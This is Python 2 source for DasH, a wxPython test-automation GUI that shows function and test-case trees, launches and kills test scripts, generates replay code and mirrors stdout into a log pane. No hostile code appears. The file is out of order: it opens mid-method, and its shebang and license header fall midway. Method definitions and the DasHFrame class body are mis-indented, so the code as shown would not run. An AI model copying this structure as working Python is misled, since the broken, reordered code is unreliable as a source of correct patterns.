            for attr in sorted(dir(lmod)):
                if attr.startswith('__'):
                    continue
                attr_obj = getattr(lmod, attr)
                attr_type = type(attr_obj)
                if attr_type == types.FunctionType :
                    new_item = self.function_page.InsertItem(new_module, new_module, '{}'.format( attr))
                    item_info = wx.TreeItemData({'name':'{}.{}'.format(module_name,attr)})
                    self.function_page.SetItemData(new_item, item_info)
                elif attr_type== types.TypeType:
                    class_obj = getattr(lmod, attr)
                    new_class = self.function_page.InsertItem(new_module, new_module, attr)
                    item_info = wx.TreeItemData({'name':'{}.{}'.format(module_name,attr)})
                    # BUG FIX: the original attached this data to ``new_item``
                    # (stale from a previous iteration, or even unbound when a
                    # class is the first attribute) instead of ``new_class``.
                    self.function_page.SetItemData(new_class, item_info)
                    for attr_in_class in sorted(dir(class_obj)):
                        if attr_in_class.startswith('__'):
                            continue
                        attr_obj = getattr(class_obj,attr_in_class)
                        attr_type =type(attr_obj)
                        if attr_type == types.MethodType :
                            item_info = wx.TreeItemData({'name':'{}.{}.{}'.format(module_name,attr,attr_in_class)})
                            new_item = self.function_page.InsertItem(new_class, new_class, attr_in_class)
                            self.function_page.SetItemData(new_item, item_info)
        self.function_page.Expand(root)
        first_child = self.function_page.GetFirstChild(root)
        self.function_page.Expand(first_child[0])
def on_LeftDClick_in_Function_tab(self,event):
        """Copy the double-clicked function's dotted name into the command box."""
        event.Skip()
        selected = self.function_page.GetSelection()
        node_data = self.function_page.GetItemData(selected)
        text_in_tree = self.function_page.GetItemText(selected)
        if node_data != None and node_data.Data.has_key('name'):
            dotted_name = node_data.Data['name']
            info('click item in Functions tab: {}'.format(dotted_name))
            # All UI mutations are deferred to the event loop via CallAfter.
            wx.CallAfter(self.m_command_box.Clear)
            wx.CallAfter(self.m_command_box.AppendText, dotted_name + ' ')
            wx.CallAfter(self.m_command_box.SetFocus)
            wx.CallAfter(self.m_command_box.SetInsertionPointEnd)
            wx.CallAfter(self.m_command_box.Refresh)
def on_right_down_in_function_tab(self, event):
        """Show a context menu offering to rebuild the FUNCTION tree."""
        context_menu = wx.Menu()
        refresh_entry = wx.MenuItem(context_menu, wx.NewId(), "Refresh")
        context_menu.AppendItem(refresh_entry)
        self.Bind(wx.EVT_MENU, self.on_refresh_function_page, refresh_entry)
        self.PopupMenu(context_menu, event.GetPosition())
def on_refresh_function_page(self, event):
        """Rebuild the FUNCTION tree from scratch (context-menu handler)."""
        self.function_page.DeleteAllItems()
        self.build_function_tab()
        info('Refresh Function tab done!')
def add_cmd_to_sequence_queue(self, cmd, module_name):
        """Queue *cmd* (with a timestamp) for later code generation and
        remember its module so generate_code can emit the import."""
        if module_name not in self.import_modules:
            self.import_modules.update({module_name:module_name})
        self.sequence_queue.put([cmd,datetime.now() ])
def generate_code(self, file_name ):
        """Emit a standalone Python test script replaying the queued commands.

        Drains self.sequence_queue into a ``__main__`` template (imports for
        every module seen by add_cmd_to_sequence_queue, a try/except wrapper
        that closes all opened dut sessions on failure) and appends the
        result to *file_name*.  Nothing is written when the queue held no
        commands.
        """
        str_code ="""#created by DasH
if __name__ == "__main__":
    import sys, traceback
    sys.path.insert(0,r'{}')
    sys.path.insert(0,r'{}')
    import lib.common
    log_path= '../log/tmp'
    log_path= lib.common.create_case_folder()
    try:
""".format(self.src_path,self.lib_path )
        sessions =[]
        # One import line per module that contributed a command.
        for module in self.import_modules:
            str_code+='        import {mod}\n'.format(mod=module)#\n        {mod}_instance = {mod}()
        no_operation = True
        # Drain the queue; each entry is [command_source, timestamp].
        while True:
            try:
                cmd, timestamp =self.sequence_queue.get(block=False)[:2]
                str_code +='        {} #{}\n'.format(cmd, timestamp.isoformat( ' '))
                # Track session variables created via dut.dut(...) so they can
                # be closed at the end of the generated script.
                if cmd.find('dut.dut(')!=-1:
                    sessions.append(cmd.split('=')[0].strip())
                no_operation=False
                #datetime.now().isoformat()
            except Exception as e:
                # Queue empty -- done draining.
                break
        close_session=''
        str_code+='''    except Exception as e:
        print(traceback.traceback.format_exc())\n'''
        # On failure: close every session, then exit non-zero.
        for ses in sessions:
            str_code+='''        {}.close_session()\n'''.format(ses)
        str_code+='        sys.exit(-1)\n'#, sys.exit(-1)
        # On success: close every session.
        for ses in sessions:
            str_code+='''    {}.close_session()\n'''.format(ses)
        info(str_code)
        if not no_operation:
            with open(file_name, 'a+') as f:
                f.write(str_code)
def on_right_down_in_case_tab(self, event):
        """Context menu for the CASE tree: run or kill the selected script."""
        context_menu = wx.Menu()
        run_entry = wx.MenuItem(context_menu, wx.NewId(), "Run Test")
        kill_entry = wx.MenuItem(context_menu, wx.NewId(), "Kill Test")
        context_menu.AppendItem(run_entry)
        context_menu.AppendItem(kill_entry)
        self.Bind(wx.EVT_MENU, self.on_run_script, run_entry)
        self.Bind(wx.EVT_MENU, self.on_kill_script, kill_entry)
        self.PopupMenu(context_menu, event.GetPosition())
def on_kill_script(self,event):
        """Terminate the process attached to the selected CASE node, if it
        is still running; otherwise just report its final result."""
        selected = self.case_suite_page.GetSelection()
        node_label = self.case_suite_page.GetItemText(selected)
        node_data = self.case_suite_page.GetItemData(selected).Data
        if node_data.has_key('PROCESS'):
            proc = node_data['PROCESS']
            full_name = node_data['FULL_NAME']
            info('script:{}, returncode:{}'.format(full_name,proc.returncode))
            if proc.returncode is None:
                # returncode None means the process has not exited yet.
                info('Terminate alive process {}:{}'.format(node_label, proc.pid))
                proc.terminate()
            else:
                verdict = 'FAIL' if proc.returncode else 'PASS'
                info('{}:{} completed with returncode {}'.format(node_label, proc.pid, verdict))
def on_run_script(self,event):
        """Launch the selected CASE-tree script in a new console process.

        The tree item label is split shlex-style into script name plus extra
        arguments; any previous process attached to the node is killed first.
        The Popen handle is stored back on the node so on_kill_script can
        manage it.  NOTE(review): CREATE_NEW_CONSOLE is Windows-only.
        """
        hit_item = self.case_suite_page.GetSelection()
        item_name = self.case_suite_page.GetItemText(hit_item)
        import shlex
        # Split the label honouring double-quoted arguments; drop the first
        # token (the display name) and keep the rest as script arguments.
        lex = shlex.shlex(item_name)
        lex.quotes = '"'
        lex.whitespace_split = True
        script_and_args =list(lex)[1:]
        item_data = self.case_suite_page.GetItemData(hit_item).Data
        script_name = self.case_suite_page.GetItemData(hit_item).Data['path_name']
        from lib.common import run_script
        from multiprocessing import Process, Queue
        import subprocess
        # Ensure any still-running instance on this node is stopped first.
        self.on_kill_script(event)
        #queue = Queue()
        try:
            # Prefer the frozen runner when present; fall back to the current
            # Python interpreter.
            if os.path.exists('script_runner.exe'):
                execute = 'script_runner.exe'
                cmd = [execute,script_name ]+script_and_args + ['-l','{}'.format(self.log_path)]
                #p=subprocess.Popen(cmd, creationflags = subprocess.CREATE_NEW_CONSOLE)
            else:
                cmd = [sys.executable, script_name ]+script_and_args+ ['-l','{}'.format(self.log_path)]
            p=subprocess.Popen(cmd, creationflags = subprocess.CREATE_NEW_CONSOLE)
            # Attach the live process to the tree node for later kill/status.
            self.case_suite_page.GetItemData(hit_item).Data['PROCESS']=p
            self.case_suite_page.GetItemData(hit_item).Data['FULL_NAME']= item_name
            info('start process {} :{}'.format(item_name, p.pid))
            self.running_process.append([item_name, p])
            #p.join() # this blocks until the process terminates
            time.sleep(1)
        except Exception as e :
            import traceback
            error(traceback.format_exc())
        #p = Process(target=run_script, args=[script_name, script_and_args])
        #p.start()
def polling_running_cases(self):
        """Walk every record in dict_test_report (placeholder for live
        status polling of running cases).

        Record layout per add_newe_case_to_report:
        [start_time, end_time, duration, return_code, proc].
        """
        for pid in self.dict_test_report:
            for case_name in self.dict_test_report[pid]:
                # BUG FIX: the original unpacked ``[case_name]`` (a one-element
                # list literal) into five names, raising ValueError on the
                # first record; unpack the stored record instead.
                start_time, end_time, duration, tmp_return_code, proc = self.dict_test_report[pid][case_name]
                #todo: polling proc status and fill report
def add_newe_case_to_report(self, pid, case_name, proc):
        """Register a freshly started case in dict_test_report.

        The record is [start_time, end_time, duration, return_code, proc];
        end_time and return_code stay None until the case finishes.
        """
        record = [datetime.now(), None, 0, None, proc]
        self.dict_test_report.setdefault(pid, {})[case_name] = record
def update_case_status(self, pid,case_name, return_code=None):
        """Refresh one case record in dict_test_report.

        With ``return_code`` None the case is still running and only the
        elapsed duration is updated; otherwise the case has finished, so
        end time and return code are recorded as well.
        """
        now = datetime.now()
        start_time, end_time, duration, tmp_return_code ,proc= self.dict_test_report[pid][case_name]
        if return_code is None:
            duration = (now-start_time).total_seconds()
            self.dict_test_report[pid][case_name]=[start_time, end_time, duration, tmp_return_code, proc]
        else:
            duration = (now-start_time).total_seconds()
            # BUG FIX: the original wrote to dict_test_report[case_name][pid]
            # (keys swapped), corrupting the report when a case completed.
            self.dict_test_report[pid][case_name]=[start_time, now, duration, return_code, proc]
        #p.terminate()
#done: 2017-08-22, 2017-08-19 save main log window to a file
#todo: 2017-08-19 add timestamps to log message
#done: 2017-08-22, 2017-08-19 mail to someone
#todo: 2017-08-19 run a script in DasH
#todo: 2017-08-19 generate test report
#todo: 2017-08-19 publish all test cases in a web page
#todo: 2017-08-19 trigger a test remote via web page
#todo: 2017-08-19 re-run failed cases
#todo: 2017-08-19 build executable package for DasH
#todo: 2017-08-19 a popup window to get email address/password/mail_server...
#todo: 2017-08-22 output in m_log window has a lot of empty line, need remove them
#todo: 2017-08-23 in common.call_function_in_module, should end all threads which are started in previous instance
#todo: 2017-08-23 add tips for all tree items in the left panel
#!/usr/bin/python
'''The MIT License (MIT)
Copyright (c) 2017 Yu Xiong Wei(try.dash.now@gmail.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.'''
__author__ = 'sean yu (Yu, Xiongwei)'
__doc__ = '''
it is the GUI of DasH, aka "Do as Human"
created 2017-05-06 by Sean Yu
'''
import webbrowser
from datetime import datetime
import wx.grid as gridlib
import traceback
import wx
from gui.MainFrame import MainFrame
import os
from lib.common import load_bench, caller_stack_info,info, get_next_in_ring_list,get_folder_item, info,debug, warn, error, parse_command_line, call_function_in_module
import re
import time
import threading
import ConfigParser
import sys
import inspect
import Queue
from SessionTab import SessionTab
import imp
import types
from lib.common import send_mail_smtp_without_login
from lib.common import run_script
from multiprocessing import Process
import subprocess
import shlex
#from dut import dut
DUT={}
class RedirectText(object):
    """File-like object that mirrors writes to a wx text control, the real
    stdout, and (optionally) a ``dash.log`` file.

    Installed as sys.stdout/sys.stderr by DasHFrame; a lock serializes
    writes coming from multiple worker threads.
    """
    font_point_size = 10
    old_stdout = None        # original sys.stdout, kept for pass-through and restore
    old_stderr = None        # original sys.stderr, kept for restore on close
    write_lock = None        # serializes write() across threads
    log_file = None          # optional on-disk copy of everything written
    error_pattern = None     # regex for error-ish text (highlighting path is disabled below)
    def __init__(self,aWxTextCtrl, log_path=None):
        self.old_stderr , self.old_stdout=sys.stderr , sys.stdout
        self.out=aWxTextCtrl
        self.font_point_size = self.out.GetFont().PointSize+2
        self.write_lock = threading.Lock()
        self.error_pattern = re.compile('error|\s+err\s+|fail|wrong|errno')
        if log_path:
            name = '{}/dash.log'.format(log_path)
            self.log_file = open(name, 'w+')
            # Expose the log file's fileno so callers expecting a real file work.
            self.fileno = self.log_file.fileno
    def write(self,string):
        """Write *string* to the original stdout, the wx control, and the log.

        Any exception is swallowed so a broken UI never kills the writer
        thread; the lock is always released.
        """
        self.write_lock.acquire()
        try:
            self.old_stdout.write(string)
            #string = string.replace('\\033\[[0-9\;]+m', '')
            #self.old_stderr.write(string)
            err_pattern = self.error_pattern#re.compile('error|\s+err\s+|fail|wrong')
            #wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
            # NOTE: the error-highlighting branch below is intentionally
            # disabled (``if False``); only the plain green-on-black path runs.
            if False:#err_pattern.search(string.lower()):
                last_start = 0
                for m in err_pattern.finditer(string.lower()):
                    #print(m.start(), m.end(), m.group())
                    #wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
                    self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
                    self.out.AppendText( string[last_start:m.start()])
                    self.out.SetDefaultStyle(wx.TextAttr(wx.RED, wx.YELLOW,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
                    #wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.RED, wx.YELLOW,font =wx.Font(self.font_point+2, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
                    self.out.AppendText( string[m.start():m.end()])
                    last_start= m.end()
                #wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
                self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
                self.out.AppendText( string[last_start:])
            else:
                self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
                wx.CallAfter(self.out.AppendText, string)
            if self.log_file:
                self.log_file.write(string)
                self.log_file.flush()
        except:
            pass
        self.write_lock.release()
    def close(self):
        """Flush and close the on-disk log, if one was opened."""
        if self.log_file:
            self.log_file.flush()
            self.log_file.close()
    def flush(self):
        """Flush the on-disk log (file-like interface requirement)."""
        if self.log_file:
            self.log_file.flush()
class process_info(object):
    """Read-only view over a spawned test-script process.

    Wraps any object exposing ``pid`` and ``returncode`` (e.g. a
    subprocess.Popen) and always reports the live return code.
    """
    process = None
    pid=None
    full_name=None
    def __init__(self,name, process):
        self.process= process
        self.pid = process.pid
        self.full_name =name
        # BUG FIX: the original also executed ``self.returncode =
        # process.returncode`` here, which raises AttributeError because
        # ``returncode`` is a read-only property; the property below is the
        # single source of truth.
    @property
    def returncode(self):
        # Read the current value from the underlying process each time.
        return self.process.returncode
class FileEditor(wx.Panel):
    """Editor tab hosted in the AUI notebook: a plain-text control for
    ``type='text'`` files or a 50x5 grid for spreadsheet-style files.

    Ctrl+mouse-wheel zooms the font; on_close writes the text content back
    to disk.
    """
    editor =None           # wx.TextCtrl or wx.grid.Grid, chosen in __init__
    font_size=10
    parent=None
    type = None            # 'text' or 'grid' (shadows the builtin; kept for compatibility)
    sessions_node =None
    function_node =None
    case_suite_node =None
    full_file_name = None  # path the tab was opened from / saves to
    file_instance = None
    def on_close(self):
        """Persist the editor contents back to the original file.

        NOTE(review): only meaningful for the text editor -- a grid editor
        has no GetValue, so closing a grid tab with a file name would raise.
        """
        if self.full_file_name:
            data = self.editor.GetValue()
            with open(self.full_file_name, 'w') as f:
                f.write(data)
                f.flush()
        #done 2017-9-12: handle close tab in edit_area
    def __init__(self, parent, title='pageOne', type ='grid', file_name = None):
        """@param parent: notebook hosting the page.
        @param title: unused placeholder.
        @param type: 'text' loads *file_name* into a text control; anything
            else builds an empty function/arguments grid.
        @param file_name: file to load (text mode) and save to on close.
        """
        wx.Panel.__init__(self, parent)
        self.parent = parent
        self.type = type
        self.full_file_name = file_name
        #self.editor = wx.TextCtrl(self, style = wx.TE_MULTILINE|wx.TE_RICH2|wx.EXPAND|wx.ALL, size=(-1,-1))
        if type in ['text']:
            self.editor = wx.TextCtrl( self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_AUTO_URL|wx.VSCROLL|wx.TE_RICH|wx.TE_MULTILINE&(~wx.TE_PROCESS_ENTER))
            #wx.richtext.RichTextCtrl( self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.VSCROLL|wx.HSCROLL|wx.NO_BORDER|wx.WANTS_CHARS )
            with open(self.full_file_name, 'r') as f:
                for line in f.readlines():
                    self.editor.AppendText(line)
        else:
            # Grid mode: column 0 holds function names (bold), the rest
            # hold their arguments (blue).
            self.editor= gridlib.Grid(self)
            self.editor.CreateGrid(50, 5)
            col = self.editor.GetNumberCols()
            row = self.editor.GetNumberRows()
            function_color ='black'
            arg_color = 'blue'
            for c in range(0, col):
                if c < 1 :
                    self.editor.SetColLabelValue(c, 'Function Name')
                else:
                    self.editor.SetColLabelValue(c, 'arg# {}'.format(c))
                for r in range (0, row):
                    self.editor.SetCellTextColour(r,c,function_color if c <1 else arg_color)
            for r in range (0, row):
                self.editor.SetCellFont(r, 0, wx.Font(self.font_size,wx.SWISS, wx.NORMAL, wx.BOLD ))
        self.editor.Bind( wx.EVT_MOUSEWHEEL, self.editor_OnMouseWheel )
        sizer = wx.BoxSizer()
        sizer.Add(self.editor, 1, wx.EXPAND)
        self.SetSizer(sizer)
    def editor_OnMouseWheel(self,event):
        """Zoom the editor font with Ctrl+mouse-wheel.

        Wheel-down shrinks by ``interval_step`` (clamped at
        ``min_font_size``); wheel-up grows by 1.  Without Ctrl the event is
        ignored.
        """
        min_font_size = 5
        interval_step = 2
        if event.ControlDown():
            pass
        else:
            return
        if event.GetWheelRotation() < 0:
            if self.font_size>min_font_size:
                self.font_size-=interval_step
        else:
            self.font_size+=1
        if self.type in ['text']:
            f =self.editor.GetFont()
            f.PointSize= self.font_size
            self.editor.SetFont(f)
        else:
            # Grid control: the font must be reapplied cell by cell.
            col = self.editor.GetNumberCols()
            row = self.editor.GetNumberRows()
            for c in range(0, col):
                for r in range (0, row):
                    f = self.editor.GetCellFont(r, c)
                    f.PointSize = self.font_size
                    self.editor.SetCellFont(r, c, f)
        self.Refresh()
        #wx.StaticText(self, -1, "THIS IS A PAGE OBJECT", (20,20))
#DONE: DasHFrame should handle CLOSE event when closing the app, call on_close_tab_in_edit_area for all opened sessions and files
from functools import wraps
import pprint
def gui_event_thread_handler( func):
    """Decorator: call *func*, log any exception instead of propagating it.

    Returns the wrapped function's result, or None when it raised.
    """
    @wraps(func)
    def inner(*args, **kwargs):
        # BUG FIX: the original wrapper was declared as
        # ``def inner(func, *args, **kwargs)``, so the first call argument
        # shadowed the decorated function and was invoked instead of it.
        # The decorated function is captured from the enclosing scope.
        ret = None
        try:
            ret = func(*args, **kwargs)
            #th = threading.Thread(target=func,args= args, kwargs=kwargs)
            #th.start()
        except:
            error(traceback.format_exc())
        return ret
    return inner
class gui_event_decorator():
    """Mixin offering a decorator that dispatches GUI handlers to threads."""
    def __init__(self):
        pass
    @classmethod
    def gui_even_handle(self, func):
        """Wrap *func* so each call runs on a fresh worker thread.

        The wrapper always returns None (the thread's result is discarded);
        failures to *start* the thread are printed, never raised.
        """
        def inner(*args, **kwargs):
            ret = None
            try:
                worker = threading.Thread(target=func, args=args, kwargs=kwargs)
                worker.start()
            except:
                print(traceback.format_exc())
            return ret
        return inner
class DasHFrame(MainFrame, gui_event_decorator):#wx.Frame
ini_setting = None
#m_left_navigator =None
redir = None
edit_area=None
tabs_in_edit_area = None
src_path = './src/'
sessions_alive=None
sequence_queue=None
history_cmd = []
history_cmd_index = -1
import_modules={'TC':''}
lib_path ='./lib'
log_path = '../log/dash'
session_path = './sessions'
suite_path = '../test_suite'
dict_test_report= ''
alive =True
mail_server=None
mail_to_list=None
mail_from=None
mail_read_url= 'outlook.office365.com'
mail_password = None
mail_user ='nonexistent@dash.com'
case_queue =None
check_case_running_status_lock = None
case_list=None
#session_names={}
web_daemon = None
web_host = None
web_port = 8888
mailed_case_pids= []
timestamp=None
mail_failure =False
last_time_call_on_idle= None
ini_file=None
dict_function_obj= {'instance':{}}
dict_function_files = {}
    def __init__(self,parent=None, ini_file = './gDasH.ini'):
        """Build the main DasH window.

        Loads (or creates with defaults) the ini configuration, redirects
        stdout/stderr into the log pane, assembles the menus, navigator
        trees (SESSION/FUNCTION/CASE), editor notebook and command box,
        starts the web server thread and populates all three trees.

        @param parent: optional parent window for MainFrame.
        @param ini_file: path of the configuration file; written with the
            class-level defaults when it does not exist yet.
        """
        #wx.Frame.__init__(self, None, title="DasH")
        gui_event_decorator.__init__(self)
        # Filesystem-safe timestamp used for this run.
        self.timestamp= datetime.now().isoformat('-').replace(':','-')
        self.case_list= []
        self.case_queue = Queue.Queue()
        self.dict_test_report={}
        self.check_case_running_status_lock = threading.Lock()
        self.tabs_in_edit_area=[]
        self.sessions_alive={}
        MainFrame.__init__(self, parent=parent)
        self.sequence_queue= Queue.Queue()
        #self.sequence_queue.put()
        # --- configuration: read the ini, or write one with the defaults ---
        self.ini_setting = ConfigParser.ConfigParser()
        if os.path.exists(ini_file):
            self.ini_setting.read(ini_file)
            self.src_path = os.path.abspath(self.ini_setting.get('dash','src_path'))
            self.lib_path = os.path.abspath(self.ini_setting.get('dash','lib_path'))
            self.log_path = os.path.abspath(self.ini_setting.get('dash','log_path'))
            self.suite_path = os.path.abspath(self.ini_setting.get('dash', 'test_suite_path'))
            self.mail_server = self.ini_setting.get('dash', 'mail_server')
            self.mail_from =self.ini_setting.get('dash', 'mail_from')
            self.mail_to_list =self.ini_setting.get('dash', 'mail_to_list')
            self.mail_read_url =self.ini_setting.get('dash', 'mail_read_url')
            self.mail_user = self.ini_setting.get('dash','mail_user')
            self.mail_password =self.ini_setting.get('dash', 'mail_password')
            self.web_port =int(self.ini_setting.get('dash', 'web_port'))
        else:
            # First run: persist the class-level defaults as a template.
            with open(ini_file, 'w') as tmp_ini_file:
                tmp_ini_file.write('''[dash]
test_suite_path = ../test_suite/
log_path= {log_path}
lib_path = {lib_path}
session_path={session_path}
#the source python file folder
src_path = {src_path}
mail_server={mail_server}
mail_to_list={mail_to_list}
mail_user={mail_user}
mail_from ={mail_from}
mail_read_url={mail_read_url}
mail_password = {mail_password}
web_port={web_port}
'''.format(
                log_path = self.log_path,
                lib_path = self.lib_path,
                session_path = self.session_path,
                src_path = self.src_path,
                mail_server = self.mail_server,
                mail_to_list = self.mail_to_list,
                mail_user = self.mail_user,
                mail_from = self.mail_from,
                mail_read_url = self.mail_read_url,
                mail_password = self.mail_password,
                web_port = self.web_port))
                tmp_ini_file.flush()
            #self.ini_setting.read(ini_file)
        self.ini_file = ini_file
        from lib.common import create_case_folder, create_dir
        # Scripts launched by DasH inherit the log folder via argv ('-l <path>').
        sys.argv.append('-l')
        sys.argv.append('{}'.format(self.log_path))
        from lib.common import create_dir
        self.log_path = create_dir(self.log_path)
        self.suite_path = create_dir(self.suite_path)
        self.lib_path = create_dir(self.lib_path)
        self.src_path = create_dir(self.src_path)
        if not os.path.exists(self.log_path):
            os.mkdir(self.log_path)
        self.add_src_path_to_python_path(self.src_path)
        # --- route stdout/stderr into the log pane (and dash.log) ---
        self.redir = RedirectText(self.m_log, self.log_path)
        sys.stdout = self.redir
        sys.stderr = self.redir
        self.m_log.SetBackgroundColour('Black')
        self.m_log.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK, font =wx.Font(9, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.BOLD, faceName = 'Consolas')))
        #self.m_editor.WriteText('welcome to dash world')
        self.m_log.WriteText('Welcome to DasH!\n')
        self.m_command_box.WriteText('functions.static_function_in_module test_ssh 2')
        # --- "Operations" menu ---
        fileMenu = wx.Menu()
        #open_test_suite = fileMenu.Append(wx.NewId(), "Open TestSuite", "Open a Test Suite")
        #open_test_case = fileMenu.Append(wx.NewId(), "Open TestCase", "Open a Test Case")
        generate_test_report = fileMenu.Append(wx.NewId(), "Generate Test Report", "Generate Test Report")
        generate_code = fileMenu.Append(wx.NewId(), "Generate Python Code", "Generate Python Code")
        mail_test_report = fileMenu.Append(wx.NewId(), "Mail Test Report", "Mail Test Report")
        get_case_queue = fileMenu.Append(wx.NewId(), "Get Case Queue", "Get Case Queue") #done
        clear_case_queue = fileMenu.Append(wx.NewId(), "Clear Case Queue", "Clear Case Queue")
        kill_running_case = fileMenu.Append(wx.NewId(), "Kill Running Case(s)", "Kill Running Case(s)")
        self.m_menubar_main.Append(fileMenu, "&Operations")
        self.Bind(wx.EVT_MENU,self.on_generate_test_report ,generate_test_report)
        self.Bind(wx.EVT_MENU,self.on_generate_code ,generate_code)
        self.Bind(wx.EVT_MENU,self.on_mail_test_report ,mail_test_report)
        self.Bind(wx.EVT_MENU,self.get_case_queue ,get_case_queue)
        self.Bind(wx.EVT_MENU,self.on_clear_case_queue ,clear_case_queue)
        self.Bind(wx.EVT_MENU,self.on_kill_running_case ,kill_running_case)
        self.Bind(wx.EVT_CLOSE, self.on_close)
        self.m_command_box.Bind(wx.EVT_TEXT_ENTER, self.on_command_enter)
        self.m_command_box.Bind(wx.EVT_KEY_UP, self.on_key_up)
        self.m_command_box.Bind(wx.EVT_KEY_DOWN, self.on_key_down)
        # --- left navigator: SESSION / FUNCTION / CASE trees in a notebook ---
        from wx.aui import AuiNotebook
        bookStyle = wx.aui.AUI_NB_DEFAULT_STYLE &(~wx.aui.AUI_NB_CLOSE_ON_ACTIVE_TAB)
        self.navigator = AuiNotebook(self.m_left_navigator, style= bookStyle )
        self.case_suite_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
        self.function_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
        self.session_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
        self.navigator.AddPage(self.session_page, 'SESSION')
        self.navigator.AddPage(self.function_page, 'FUNCTION')
        self.navigator.AddPage(self.case_suite_page, 'CASE')
        # --- right side: editor notebook over log pane over command box ---
        self.edit_area = AuiNotebook(self.m_file_editor, style = wx.aui.AUI_NB_DEFAULT_STYLE)
        if False:
            new_page = FileEditor(self.edit_area, 'a', type= type)
            self.edit_area.AddPage(new_page, 'test')
            self.tabs_in_edit_area.append(('test'))
        self.edit_area.Enable(True)
        right_sizer = wx.BoxSizer(wx.VERTICAL)
        #right_sizer =wx.GridSizer( 3, 1, 0, 0 )
        left_sizer = wx.BoxSizer(wx.HORIZONTAL)
        left_sizer.Add(self.m_left_navigator, 1, wx.EXPAND)
        self.case_suite_page.Bind(wx.EVT_LEFT_DCLICK, self.m_case_treeOnLeftDClick)
        #self.case_suite_page.Bind(wx.EVT_MOUSEWHEEL, self.case_tree_OnMouseWheel)
        self.case_suite_page.Bind(wx.EVT_TREE_ITEM_EXPANDING, self.m_case_treeOnTreeItemExpanding)
        self.session_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Session_tab)
        self.function_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Function_tab)
        self.function_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_function_tab)
        self.case_suite_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_case_tab)
        self.session_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_session_tab)
        self.edit_area.Bind(wx.aui.EVT__AUINOTEBOOK_TAB_RIGHT_DOWN, self.on_right_up_over_tab_in_edit_area)
        main_sizer = wx.BoxSizer(wx.HORIZONTAL)
        #main_sizer = wx.GridSizer( 1, 2, 0, 0 )
        nav_sizer = wx.BoxSizer()
        nav_sizer.Add(self.navigator, 1, wx.EXPAND, 1)
        self.m_left_navigator.SetSizer(nav_sizer)
        #main_sizer = wx.BoxSizer(wx.HORIZONTAL)
        #main_sizer.Add(left_sizer, 3, wx.EXPAND)
        main_sizer.Add(left_sizer, 2, wx.EXPAND)
        edit_sizer = wx.BoxSizer()
        edit_sizer.Add(self.edit_area, 1, wx.EXPAND, 1)
